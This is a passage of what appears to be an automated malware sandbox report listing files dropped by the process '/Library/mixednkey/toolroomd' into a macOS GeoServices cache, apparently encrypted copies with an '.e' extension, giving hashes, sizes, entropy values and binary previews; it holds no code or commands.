SSDEEP:	1536:01VRTV0uZvjeCgtVQwZnGVPYHwdUcD80utupTKdVT2nVGrCWz3:CVHZ6XPvnGVPYHPcDPTKfpGQ
MD5:	11A4BE60BAEC7FC2C99B09E852F5A7E8
SHA1:	3F8D67D035A35D3C9CD5E0F62A11E52A92D16795
SHA-256:	C8F3C1FD69E5D6E166F9EE5CD272FDA2F083B0D497E431BBFBCB5DC8B9A11C1E
SHA-512:	2876EAB8176E77A669030C7334E0558F3EC648950A34DB24D514D5880A3971155E838F361AEAF5218C030E608BBA510E63DEC0711F1F3FDD7E7D8E039CEAF8D5
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3......(H.Dx..Qd..F^u.d.!n.a..9>..R.g..@\|..;...G..8..<..{..C.l.>...C.).\.s.D....06`.h.6.......iI..0....Hj.i.R..{.D+.r..\~u..o...............O.\PxwT..9=..T....Ui.@....q..#7.z7\...' .p5.8..... ..b..=...\......e.R...GG...SJh../z..t..Y..,..h].P;..M...s..t..cd..r.k=...@...@.....jI...}4.<....W.\..e...."t....._..4a.S.a48-...gZS....M...}....Yz.{;.. ..7.5..'...>.)cEj.........A.......q...I....B7k_.......5.9:.Q....J0...)..b..S.U....9..SW../....+AN$d.C89#/......z..}w:....K...O"2,.3.....,.......)...A.$..b.:....(..p^.h..7%~.0.A.....G.}...f.k... <.e..6j[.. _@..T....#.b.9.x.d'.h...w...yx.^QJY..A!A.J.A..Z.....D.n.`.nD.Q.&h.D+.h....v.s....D......3..6....R;.Eq....'.m..... }%q.S/.$..=...3./......!(Z.tEw.cw.....$...Sp<..&o....2../...G.M..B.....8.S.A...O.h.o.=. gb....&jq...k...i.7.f........zj..9..h..:......./..p.\|z.sq.jq........y..r.#.(.J.......wa4.3.)..0.R .....Y......+4A.L..

/Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient1-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	10378
Entropy (8bit):	7.962201937261998
Encrypted:	false
SSDEEP:	192:gYyscHthY2XtHLyoRklxtnXQ2w4xcrGgYgzP/YmsUV5wali1F/lv:gSgVL9w/g2yPbImsLalc9v
MD5:	8F9D58F54CBDF7C12997E867EF392696
SHA1:	5F178AC8CDE6A4B31E4F2FCC8539E927165BCAC4
SHA-256:	CA075FF5B93265605F5E0D191A08805793E658A3ACE8321CC31AC851C6022801
SHA-512:	E2EA2A5C9F5FFFD7DAAE6F29E2FC7600CFD3299203005C4A31AF6BC085F6B354D3EC1706CF8464296B141904406570A7ACF44C42E9B8A72EF1DD1CF7805AE5BB
Malicious:	false
Preview:	.<.\|.....f.A..>..D....2.....(d....&.f.;......$1..@Y.i .Y.ap..;...%7H...U.o.S-q.;...A....$..=...#..T..P.WY..F.1.....z..^..x.K..$.)...l.n..b..\\|...;N...i1[.....9"..7e].sQ.....xOq..{b...Uvv.... .x.....??....q......I.Qd9..e-p......U.#.e.Q..^S.>B..,XS.W/cV..A6G...8.T..5R..../bT.u(aF.s...-N{...<...W!...o`L......N.~M\|.z..v.2v.1J..d..o.....(...#.FfM...[.....4w,;.m...b5...C.v."4..%. pB....G.......'.s.....I.^.....(..B;I.../8.~...R3...L..u.i.a.>.q.:.4}\..z.:...].\..N.4..i.sv&R.~t....?...#SC)..<>.'.Vk.A.al.+\|E.....`jU.P.MR...$.u..>...)......#M......+.Q]..C..T.yG...5.K\.....-$Jd.P^..XSA.6.E.5....=...=.\|..j.S...`.....2.....LN......OB...P.T]..o..6f....2.R.......{.....g...I.w....h..AMs.0....k.OW.4....@?%.....".A.....A..Y..+r..r...D...[._......aA.(..>......t.W....?..~....^.h.g....W.`....)m..UME......av.#....8.L.A.^.dE.'g]...m..zk..]...{^A .a./.,\R.J..wt...A.d..\.....V..v..I>.9P. ...u5...\|.xR>.F..8..-..........L..4.&jJ.3n..<?.v...K9..x..$y...A..

/Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient1-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	67422
Entropy (8bit):	7.996388884754721
Encrypted:	true
SSDEEP:	1536:g5T1oIxRnmwCawiMYcp9UN3Mo94y3LJshCSnl32JqJ0/SH:g5T1oIT/COqp43z948L+gSnlmJq1H
MD5:	8A52DA0D4A37B15BD5CB64B6600BAB13
SHA1:	ECD25F744261C2BAC6B33EF2DB912BE168557BEB
SHA-256:	51FC08ECE148A8B87F460168999020B99C8942861B2B7921087FEC36960EC61D
SHA-512:	0B5E2033AFE16715E8B9B7BD9FD033BDAC31F3E4A67EFF4A17635A0186E18315CFD63FB5B82876BA02957A169DAD04109AE7C1EA3C85808A3B7E52D9FC5CB252
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3....\|........%.Y.P........-.I..W.x.DO.pPD.\|w.....9"!n..z....[..<....x.jU...\|.-.nsC..b.Xo.w.c.}I.'....k..B=S..B}...I..p.}.g.qe...`*\.....p7T7p>\t......#.N/.<.R_.9..Kc2+...S7M../4...U-u.(S...;.4Kd.......U..G=.f......z{9Yo-...OjZ%.v.&..NQ..?...iz.R.R>......<.....[.....?.......'.P...}.......9&..Bb..d...q...jHn..x..p..6b.8"........J..!..{.o<..L..F....[..Q......,9..\.[...zh....=M..w.A`.s`.....;.roHN....}....l.)_.5...%.w.....X.@.:......@>Q.C.b...._...=.b....L.....oy@75..8...p....9.X.%....!.+])......39..v.1..q/...d...&$..,#...df.........XP...tQ=.e.....q.\`u.J...I'...x{{.4x...d.q.O..Fl$n..::.\..x...".....Z........Nz.S.H..ZJ...'.P...H.\..Lz....q......a.s]7E&....yK.......g.#..a.I..3...Q...aK[40L.O8.......7.,.T....O...R.K.....L.{ ...+.Y{.E_pACw..7........x..6Q.E.;<...:0H%.....}R...D-.......4.!...U.j....Y.Q......N.n.l.T.x.{..4.........&H..-I.b.l.(g.d.m=.y.0...IC:-......M.

/Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient16-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	10378
Entropy (8bit):	7.9622577667260765
Encrypted:	false
SSDEEP:	192:gYyscHthY2XtHLyoRklxtnXQ2w4xcrGgYgzP/YmsUV5wali1F/P:gSgVL9w/g2yPbImsLalcn
MD5:	5C931226E3390CB42B3121C773DAD966
SHA1:	8FDFBF82597BB49B1EF7B8A1E3E479300B71E066
SHA-256:	F9D6AFC406AA02F057F2D96C6421B3784471D58B18ABEFC9CDEE4357A850644D
SHA-512:	8AB791AF5DD8CA434A8D6C2E0F5796D329D53E58BBD2BC365D13CB6EDDE95EF4D9DDDEDBD9A3E818BBB3D679FA819243B3306CA49EA62D7381D750FFF7A47651
Malicious:	false
Preview:	.<.\|.....f.A..>..D....2.....(d....&.f.;......$1..@Y.i .Y.ap..;...%7H...U.o.S-q.;...A....$..=...#..T..P.WY..F.1.....z..^..x.K..$.)...l.n..b..\\|...;N...i1[.....9"..7e].sQ.....xOq..{b...Uvv.... .x.....??....q......I.Qd9..e-p......U.#.e.Q..^S.>B..,XS.W/cV..A6G...8.T..5R..../bT.u(aF.s...-N{...<...W!...o`L......N.~M\|.z..v.2v.1J..d..o.....(...#.FfM...[.....4w,;.m...b5...C.v."4..%. pB....G.......'.s.....I.^.....(..B;I.../8.~...R3...L..u.i.a.>.q.:.4}\..z.:...].\..N.4..i.sv&R.~t....?...#SC)..<>.'.Vk.A.al.+\|E.....`jU.P.MR...$.u..>...)......#M......+.Q]..C..T.yG...5.K\.....-$Jd.P^..XSA.6.E.5....=...=.\|..j.S...`.....2.....LN......OB...P.T]..o..6f....2.R.......{.....g...I.w....h..AMs.0....k.OW.4....@?%.....".A.....A..Y..+r..r...D...[._......aA.(..>......t.W....?..~....^.h.g....W.`....)m..UME......av.#....8.L.A.^.dE.'g]...m..zk..]...{^A .a./.,\R.J..wt...A.d..\.....V..v..I>.9P. ...u5...\|.xR>.F..8..-..........L..4.&jJ.3n..<?.v...K9..x..$y...A..

/Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient16-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	67422
Entropy (8bit):	7.996371650899495
Encrypted:	true
SSDEEP:	1536:g5T1oIxRnZwCawiM4cp9UN3Mo94yZLJshCSnl32JqJ0/SS:g5T1oITSCOKp43z94uL+gSnlmJq1S
MD5:	9380CA028557E518F65C55D324E21524
SHA1:	2D4430A69414E2A83A2DC5BF271AD9A9CDB625F5
SHA-256:	88A63434E9B303166761375779C8E1BA45F5E9ED6670C9ABCA15F448FD060B92
SHA-512:	5545A2E93BD57667D9FE4C06DA6B78C22FB14B7E8A299841A7F6A6EFC053205129F6659203EBBF5218EF79B6AD33BE189075DEBCEE008E88A0A416AE1A187592
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3....\|........%.Y.P........-.I..W.x.DO.pPD.\|w.....9"!n..z....[..<....x.jU...\|.-.nsC..b.Xo.w.c.}I.'....k..B=S..B}...I..p.}.g.qe...`*\.....p7T7p>\t......#.N/.<.R_.9..Kc2+...S7M../4...U-u.(S...;.4Kd.......U..G=.f......z{9Yo-...OjZ%.v.&..NQ..?...iz.R.R>......<.....[.....?.......'.P...}.......9&..Bb..d...q...jHn..x..p..6b.8"........J..!..{.o<..L..F....[..Q......,9..\.[...zh....=M..w.A`.s`.....;.roHN....}....l.)_.5...%.w.....X.@.:......@>Q.C.b...._...=.b....L.....oy@75..8...p....9.X.%....!.+])......39..v.1..q/...d...&$..,#...df.........XP...tQ=.e.....q.\`u.J...I'...x{{.4x...d.q.O..Fl$n..::.\..x...".....Z........Nz.S.H..ZJ...'.P...H.\..Lz....q......a.s]7E&....yK.......g.#..a.I..3...Q...aK[40L.O8.......7.,.T....O...R.K.....L.{ ...+.Y{.E_pACw..7........x..6Q.E.;<...:0H%.....}R...D-.......4.!...U.j....Y.Q......N.n.l.T.x.{..4.........&H..-I.b.l.(g.d.m=.y.0...IC:-......M.

/Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient8-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	10786
Entropy (8bit):	7.963853253600347
Encrypted:	false
SSDEEP:	192:+jUw4hmvTIuJzGIYvdkPG5zPc+tir0eQ9mukC7UvpsPo6s412IyCS0Tj3:UU3oPJzGZvdgWQyeBukZSj9RrTj3
MD5:	BE4855E6A6CA773254E363C871EDA94F
SHA1:	1DD2CB7F5E2D99E423F264B34B9980553CFD79F7
SHA-256:	E0AFDE8041229170C59B4E8EC573185E3F4D247B71A657C51D072400C1318F98
SHA-512:	5DAEA17150E2000991D522A1736D82E48225F2DE9CDD27FA13802FC5A0B9B4C7DD025C8EE570EF96D303BFFF4A706A6B57CEB1662D89A56AA24A29B7263AC07E
Malicious:	false
Preview:	.<.\|.....f.A..>..D....2.....(d....&.f.;......$1..@Y.i .Y.a....d..q#....K.......G..=.A...s....I.LS..v.....I...3v.8....5..N!?4!..q...bB{...`..\.k.s!...\|.l..4F.k.U.......\P..Q..!D...bi)^..=.........vB...$1....wT....}.?P..Y..{Yu...Q.A"J..\|....(....~~..B.B...................<4s{].[....h./...b.........g..I..&.*.R.Q\|9.NS....H.}7.0.}.. ..t...0..u.U.{.m.W..c.U....tn.WD.q.v@\|%..X....M#_..Cr..+.e.`...<......u.v..[!`.!)..+b>.j.P..V..'/D^......-.?....Ojs..Tg=.Y...c.Z.A...B....^MU,...$.8.ZyB.f.(.&.u._.@?c.. ...?......].#....].....>.[.85w.%L....V..... ...."..f..p=t>...Q...U...k".....6 ....c.p..V....8.....1.n.t.=..zy..k.'a.X...2 R.sF`K.h.r........h..)......}4F8.M.3.dd..TW'eh...,.N..b8..o".Ee.;.ju....+.w.F`..^........Q.&.:.d..4.<..%2^:\|..+....\|.XrEc..6....'..;<.QX...$..C...[.a..x1.?......%O.K.....a9......D..4.....h.Q.`#`..o...xE....o.sp...O...Y.@..... u.r..h.j?..z.>T.0.j.O4...l.Ey."........O.&.e.....".H...\|.:Z...yJ.J.~P0...3..^..r..V.=.LJ.=J.G{Af.V..rC.5C.@K

/Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient8-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	71102
Entropy (8bit):	7.996300924641905
Encrypted:	true
SSDEEP:	1536:THm1LfSjC4Q08itButkdGu6yRrwwpLcEHoupZvFqmH9:TSbHQetLlKEaZNd
MD5:	6F2A375974F99B81AA38C25FA47F4785
SHA1:	D13B2A3E732F070E3B88B046D803DEC667C0273B
SHA-256:	D3BFC5935F4ABB60364DADFF2C4868E0CEA6699C83DB56BB5411E0FC56716A4A
SHA-512:	F8939A8E4B3234D25FDA075C789C369F92CC925A8043B5E949BB1EBFC40EB3D63E99CCF981017F43E9384376A4E5D726097C89ADBCE37794A8F41A89DB6D1FF0
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...y........=..m....b..\|.......D...l.a.../.3.3.5.....:.@.....R....Y..?Y1.o .4".hY.I.t@i.O.....7...x.[.x.9.P.p^?>.5i.yW..W.1R..5...l#fj..O.".:....r.%..Z-w..\...>..3eo.V1..[+..v..#.P.o......uok.)....S.....&....Bd.4..}.GI6...D..O.b,.S.Mw..2...[......=a.F+..&..F...e..p,.7.N....T[...7i.y..MON..;<...+.+x.......E..@..E...u.,...#..P......Y.w:.#;B.e......V.Z.o.....{.{..I..l&q@....F.......V.!./p2w.p../.`<.;>..#Ub..4.#Q...h..3....\.&.t,F..m&.N.....q..t.b..[P.?...TF.51.U.!p.........eI.l.........G..'...+.7..?.......+.N.a...\..8d.;...NAr..O.u...fdjM...}YX..3.1.........8.\Z0.J...2>;.A.>T...[lOg,c.9...p..G.......l{..../...PB.....3/...57.I....p.......C..s.4 S..<C6nJ!.d..:S.iC-..A./S..Qe..$.$.....B+..O....)m.QU..A.\|H...t.F..m.?..%....6J...'.Q o=%.:..n....?.....4;N&....Dc~..Xd...%..G9v.]...;.'......74...e./...U...D.....9.q....z.5H.P(!.x.Y.z0z.......$...w...j.2...P..k.#/. .G.j.`..3...

/Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient9-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	9818
Entropy (8bit):	7.958128946183322
Encrypted:	false
SSDEEP:	192:ZhWZF3VVJYuS4QsU4J4B9Oe9gtIM3ejbrrrp403WDYSLGNjO9JJsiPigHl:ZhQVVJDS4zU4EXgtRuvrpN3aiO/J7acl
MD5:	AF5BE747C8B2886470A1954E29651376
SHA1:	B8E65798FD3BC844F7520DBF085ADB3EBEB2C3FD
SHA-256:	7E3314A0BF58B8828C1D6912430D641CDD93E3D22ED8D033FB8629A93DBA3E52
SHA-512:	29495146CA8EA1B4DF63C2824F9ED1CD7EC44AEFC5428A942567E84EB67F7D6AF479614A43FDEB8971D53157AA93B6DA77104685373ECCA33F8C3F9A25424BE2
Malicious:	false
Preview:	.<.\|.....f.A..>..D....2.....(d....&.f.;......$1..@Y.i .Y.a..5Nf...3...L.4@B...d.J...;.:/..jW...C....x.a..H. =..O...X0...b..ns.....1.=..O....?.....0..+...i\E...P4...q.#,h.J...;.C......4)+&r..Y..%......`....o.P.8p.....l......#D....b.8P....D..N.n/0..K.D..S...{....$.O~.1..f..>W..5Z..]...4O..v...)...80...V....=.[.s`.v.. V.z.!.u.....1ND........'/G.$.4.N....I.O..^p........s.P.E.@Do..@n..3.4X...j...0....7.ILy@.......B...8....F....E....!GY}..pzI..].l-..7;R.....F..=.ZUr.>..\|.S.7#.d.M.kO.....U.....I.'.......o..F..o.S.;w..[._..................O%G...t....y(A..m.)..D...].7..+@...z....$@...5.-...a.K...a...(.v.[..".e....i.`..r.R...../0;7>....S.xQ,..Z......$.....=..m..B...U.gHb.h..".f7..}.G&...i.".P..U..b1......c'.FY6.. %.$....F.Z^p..t.2Q....Qs.i..}...rB.7.4'?.!n^R.........[.X6.<...z.!.y..%...,......\...~..].;...DB.}0......Pd..BW..*!....t..0.2Q.4.X.......\_C.{...{.#.m.t.gU%.x:o-(....8.,,oJt..;~.!I.].h....v.rVP...rI.............5..U..<E5.[?\|..........

/Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient9-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	62301
Entropy (8bit):	7.9960845259086435
Encrypted:	true
SSDEEP:	1536:vHZU4ZR/+cd1c0ju9Q8mWgxho/5PFC8JIEOvh3hA2EX:vHtZRTdZjKOWwhsPFC8G1Z3hA24
MD5:	3866D5EADC312301CFA14D7FC6F6CF36
SHA1:	9714B34C5C2B9437CC77C57E914751008BBBC714
SHA-256:	5842E8C61EAF560A6E2C75FE624601478D6BC81CE90EB9B73A3356931043B913
SHA-512:	F7BF04EC2320EA7D5866282E518A7C929711675FC0649F47E1F800540C52772598A5CC538C24348038AE6FCFC3A98A2BD16CDE1E114D8187E2417A19E0D359F3
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...{...%.....[.].t...).#<..{P.......r9.=1.S...z...VS..h.(..YY.fZr.}h.p.vy7]....e....%1 .}...m.s...@..&.T...V.....m.-....d....?...QK...\..N..*.=.1....I...2<.t....w.d....I.(..T).0..S....M....\...R?.L.....<_.I.D..r.>.....S..]..f@.....G.Y.k.>.r...z.!.W....\|....8T..B...9.bO..R7.;._..2IY-..'I.D.......;.F....T.R.M=.~...^N...w.7m2p..W.3.\.S..b.ko...$.d..J....6.14..v.tp.iXE.F!r..Z"A....V........\@E....7...J.g.. s.7..).&S....x9.../..Ic.bc+....-'...<.D.px%.I..K.h.......8.....V..g.k..(....w....@...........5.4_......a.e..if...}..w..l=..:..2.#5:ic.e....K...?....`..<.wp.?........D..G.O.6.K..=.....4a.e......^...R.A$....Q)>.o.M.........=....i...q..4d....R....;...l....k...H..7..l..YC.b...:.....S..O..."..lLdw...".G...P.Pt.'....c_@.EJ]^... ...5.!...e..y...T\|.>E.X.q+...]..^.B..#}$....S...h.>..0..;..g......dlZ.1.=R.......v&wL...f.....".1:fWO9#.9....c....A..1......h...{...q.C.D.Y..

/Users/berri/Library/Caches/GeoServices/Resources/.RealisticRoadHighway-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	13938
Entropy (8bit):	7.972577982650193
Encrypted:	false
SSDEEP:	192:08LGbRmPhj26//29jgfZ55oxrkYID8PicjB2SyLugW1VNgimfdbohyQAtg42TURZ:1hj2UIjY56YTDM9sbWtgV4NTG
MD5:	76A6FFB03396F1CDF5F6899B292B7D09
SHA1:	ED481F85F328CA5ADCFA55FAA3D3D8D40FA02B48
SHA-256:	4CB11B7AA4F39083572AE0FE4ACE5BAFC9B1AABD3C9FE8C2251BEA51B78C9AE3
SHA-512:	455551B5381A8E4221CAF081DDE63AFEA5599EAA696ED3763BDC99572848484C3C824DD0F0B8C52F87FD2AB938653733060C43D5B017ADD1269964B8F7CA3530
Malicious:	false
Preview:	.<.\|.....f.A..>..D....2.....(d....&.f.;......$1..@Y.i .Y.a...N..{...KP&W.."(.5P3..z.......:.T.s...L.S...pzB....... M.~..6;0..I.63j..s...?.3....J..."D....$,..L.CG...D.x\|.:....6^7$...~.o.@.tJ.El}\|...^&...u......LQ.....a..W.By4.{M._$2a-...P.q{.#.I.y......3d.....+.e..().^CU.LH#....5.=.-..v...U:#.d..Y..S.....]....x..F.....v.P..ma.D..Y..lEadAU{D.....v...\|J .&...l9C....U..<..5....X.J.g..t{.].......9....Z...C...."....]]%.%...L.....Hv.hK.3....#.Eq..q.F.G....Z..9.!E...T......^..h.l.V.j...2.@.y.2\.jO..jx"..v...._.5k...Sz).....#ODb>./.......+..?.....\|}B".f.9s..S.`..E.]...LW....T..lE?.'.......d.U.H#F.....\a.....iJ...M..n...g.....}....0c.g.;P._...+..<.8z.K.u.gK..<m2.Ww-..;.....[y.....G.d..e.....3.,..2..S..Z...]q/.Z.i......:^..'.~...eZ.....W.35....:....w..D.mv.7..a.6......[.>.X.G..?I.*%...I.......z...N..f...V:.vZ...hV./?J!..m6U..^.l......,.i..p.V.zl..~.m........P.......C.....by....5.d_.....M.....}.w..U8.....5..P...P.,R8....kT\...I..\.A..(Ll.....?.

/Users/berri/Library/Caches/GeoServices/Resources/.RealisticRoadHighway-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	131289
Entropy (8bit):	7.998568275082955
Encrypted:	true
SSDEEP:	3072:Eh9s6dkbfaJUnhbsnP3jHzpiCGQatUei1ZuQ3KvL4Q:Ezs3bf+2wPDoHpU9skPQ
MD5:	E5506A0A354E5335CAE71A7F9FBA986D
SHA1:	6C3BE942D0DF162308C669E47A2D265AF18FB628
SHA-256:	CE2380FDA95E81CAA45AEA30E45E9818BA4F6A77268AD04758EB66735EEA7EB7
SHA-512:	2ACD2CE50F5B65824FB507E355099474B4F49A15CA1310BB7F8B5BCFF6C3E022B49ED406315CCEBDEDCBE7297AA52107E57F1EE242607F64D51FABDB1AB57A36
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...0.m..n.~.z...]c....x...'..0..=......~E..;..7S..3.......$..7..%.......C...9...s..V.'H..$6hRE...t..M..E....nd.....7TY.....)IY...\|.J....h..9KzZ$.....%.Q.(O.q.&n.H8..9..........XX....)z..y../<..KR.D_.V...:...1.@.nla...R...!..~8..Cc...b.[}.Y.I.fV;.....&...Ev"_.X4...(....6...<..HW...{db=.=.x....s.-... .p/..27H...4.d.z...^.n.x.....%...[.c...U..y..<....e9.....76^3.5..;.Q....@\|..C.....9"..j....7.[...VHf..i\...\.....L._..I)..Q....~.\|. .....Oc..zQ2?..qJ.W...v...,C..._...w+.M... x<H.;.#.Z..An...C..A..~M....M.......w1.4.z..9G ."...#../7...S...g.@Uu..r..X?.YUYJ......{.@.r.Q@Zx..dW...Bh.@.V.h^............&._o.g.....^.dEd....G....D....<..qH..T........gg.........#..t......hr.5.+.m..rG"Y..\|:..yeL...[......u.....S.-...Oq....s5..i.....?0..?.3..#..... .C....0G...#.1j..........9.8..l6.. ....+.,l..6.o\.=.c...;.......(...D%...Ov.....?EcF1.........w?...e...c..7......r....y.$

/Users/berri/Library/Caches/GeoServices/Resources/.RealisticRoadLocalRoad-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	26643
Entropy (8bit):	7.9892559380740416
Encrypted:	false
SSDEEP:	768:lH7QP3rZHDjJmJllpg59ZGgENb7F8F1K2ArA:yhDjSl25vEBFS82As
MD5:	08D1292123B20ACEABCBA1447726574F
SHA1:	637F0312B43CDCCBCD362463FCB67419F4A218C1
SHA-256:	708029B543A2842FEC3C0E63B029E1C36F447F15A901817578454AD995243C2F
SHA-512:	196E403D99DDB5AEBBD307D498A2D950198463FEBEDE9F04ABB2730A1CE5923A2FD2A1FF010E2F1EAD025532A1D5A05F3432211C9F7220D3C9CC6244618E57D5
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......\.~p.;......$1..@Y..=.6...Y{4........q."V.G.S.`..1C_..\...DUh.....V@.;.....Q..7.X......(%.=O..J..S1..s.......$......\|.z.w.).).0..\|..+..vpe...4y.]..;#{.)."..>...+..2p..h.mTI.'.:ks.&.=^...H.;z5#.....q3...p0.4m^\|...H.#S....K.q1.^....fx.HYC>..C.....U..^b.x<.._.;RmH...?...aAb#...~.%..(G..<.f.....{.....'>.N..U...t...]0K.ln^..6{...\|...qz....J.H....L..p.....X....dI..Q.......H.+2.U.x$.WL.'..t...8...=..b...qA..th.....d.x1...`.F..m.....s\|.3...T...`.-..C6n4....Q....b+Yj.W..%.s>.....a..XT.....Vo......._....,...9.....%...........ds&:?.6..k..;..q.G.m.+..M.x....}.w...6De.[......a.\..7=^..V..\|.....A.9PK.I....u.......H.c.p..5..3e...0........$h;.A......\|..j.....5.S..r-.W....9.}...C........".R4yq-yXH...".gQX^.f..Lsp......T.\3..W..e. .u....C..%.Nvx..U.c8....jF......#.. .g..9..}B{....k...._.........\|..4...JUt.u..MuV.nX.\.T...H#L..PQl..!.W.....5...-!.......Oi.,..e...Z...}h.AF..sPT..u.Z.V.'4$.Co..:.F.y.o...{`.w.

/Users/berri/Library/Caches/GeoServices/Resources/.RealisticRoadLocalRoad-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	154147
Entropy (8bit):	7.998499986552193
Encrypted:	true
SSDEEP:	3072:mEaIYSVErGqn2EUQfbYu68LB96wYg6a+UcQTNJOPy8ydvv55:bllqrGq2VL8L+UcQ5JOPyJ5
MD5:	018BB2C6361D9310CEBB7A4AD5A769B4
SHA1:	4CEA73820D74581FCD5595CB1BF5555D39DBF37B
SHA-256:	7CA28B2C61F95218DE3095574FC3206060BC2E1AB00FF5F394ADC85186007373
SHA-512:	1FD45FAE685286C7832F710C78CEC4B1E42C671E3AA8E6B4D5F43A15F0DB67D8B103BFED89928B6065ECFF2EDFD3C58B74C6D866B03247B89B17AD2924C34BF9
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3.......=E....Z..f.r......q."wc..eL;%.F.n...Z.T.......h./!`.y...pG\|U. ..V.l...i6..&'C.(...\.^e.p..;vL..k?.<"d..y...`k.k0....W.,M...(.... B.u{Z...@.>K...L....s..K.D.\|..}m..Z+...........w.=...m.?-.v.f\|....s.......eQ/ia...Jt.....Hd..V.:....\.....f.N....P5E-8.D....N...........i.<.T....R.......dXa`O....I#...}D...8....<m4t.\|..#..wa..>1!9..J.#Y...t8....CU:.....)5.../n.....z.d..A.rS3..A.=.....(@+.Q\|.d.4:..p\&.H..ov.=.CI.5..^:.z\.......-..dAK...0_A....2v.....U..=?.l.J[.JyV.].@3....!.%.....s.....oslV.<m..........\|...]Z.mi.8ig./c./.&...4 .. .....(..a5.E..p.=.W..#../...4..'3.q...U....=+-..2n..V.\|...\|L.%4fd..#T..T.qY.....V......P...x=)...p.6.Q...jF.....m9....\d.......Q.h...dW\.v.;...B... T..Q.7.x..j..6P...=.X....'._Rn...).....h..!...RZ..../L.L'.a...5...v...[.oTj...z.(.....m``.......Z.^....tu..`@x....Y.....uQA4F<..N.z1.s..r....H..)..".{G.D.%....`..Dd........+..v....;Lw.<

/Users/berri/Library/Caches/GeoServices/Resources/.SFDisplayShields-CompressedBold-1.otf.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	6690
Entropy (8bit):	7.829969225898116
Encrypted:	false
SSDEEP:	192:hbEqBIMYooce3Jfi8G5jtIfI0HgmNe8eYRPu9:hokfQinII0HgIe81o9
MD5:	CBC0C800652970A1977C37BB9EB754FC
SHA1:	684D71269DCB9525426EE11C15871B2DA9D65560
SHA-256:	805C10C12A1595A33ED3A8AA2F0F4FD51D3928238BF997B1B92825C81EA8084D
SHA-512:	A70EA82DE4CD980AD8D5A69E2D9682995FB49FEC849EB62AF9CCB61C6CCE1685EBF860BE1A383EB7A75C22726DA9AA61FC306786F7A4D8A8AA6F2F847D0A55CA
Malicious:	false
Preview:	.d...(.>K.Fu...~.....m...%. ..<oq.@.j..^..;.0...i...=...t.3..,.?.......5].X..J2.X.f,..!..>wo.Gez.&...q.......]QA_\|..~?.M.`S.".;.A.....5.V.).^.)......o....R...`C.#......m.yM.K...S..(.......{q.]ST.)W.B.A..'..B.A..'..w.....c...f$.H)..m..9M....."m{.....6<.."a...8VH:...r..Qdu.o.Plu.u.".iO.........^.(...<..h.\6<.."a...fO$p.~6<.."a...ayL2g.C....Pc.z..*J..O ..8.++_.K.~=..u.Y...........7...x..?..tr.kb.2.........L.o0.1...#.m/.Q.k7!.H..g.H,.............r\C..g.'..,.......Z'.%......{.X...".A....7/!.r..b.[...l.._...,+^..{a....3$X.e.......qk.d...Z.`.~.-.$..R...).<hE.A.tzx.....Z.g...D."n.4..K..i..o....Zq\|.h.@.^..6T....k57g... ;. =...l.[...j.G.l./.q..#R..v.H.]..JMx.a.fS.u......o.j..gn.A..5.Z{w,......k57g... ;. =...l.[.Lr;.=.y...~...5....d4...an..........vyg3.t~..-C...\.B..r>)..0;QI...Fb...A..,".S..Q.!..Z..%3...5.;.5f.. J.,...-..pe.V....1a.A.\|.$..(4..t.:.1Hm:@.........=...5..K..5....S.FK.....v.Y."......Gouw%..%w.G.....N\|....:..0.c..J%i....._m....7.

/Users/berri/Library/Caches/GeoServices/Resources/.SFShieldsCondensed-Bold-1.otf.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	18115
Entropy (8bit):	7.922868570953978
Encrypted:	false
SSDEEP:	384:XmpCM6ubZTiNBDIu4KVXxIQ6Y8vp87SAl8:+bpwBcuxVXxIQ6YKm7Sl
MD5:	18CB7D7E4EA8DAD228CAE57093BFD581
SHA1:	BC9D0A9E5E510687E1B71891701959DC1C9671B0
SHA-256:	E0E96A55AAA0BADBBA03FB075D32B163B6656E94BC201B24495872D5CBD4945B
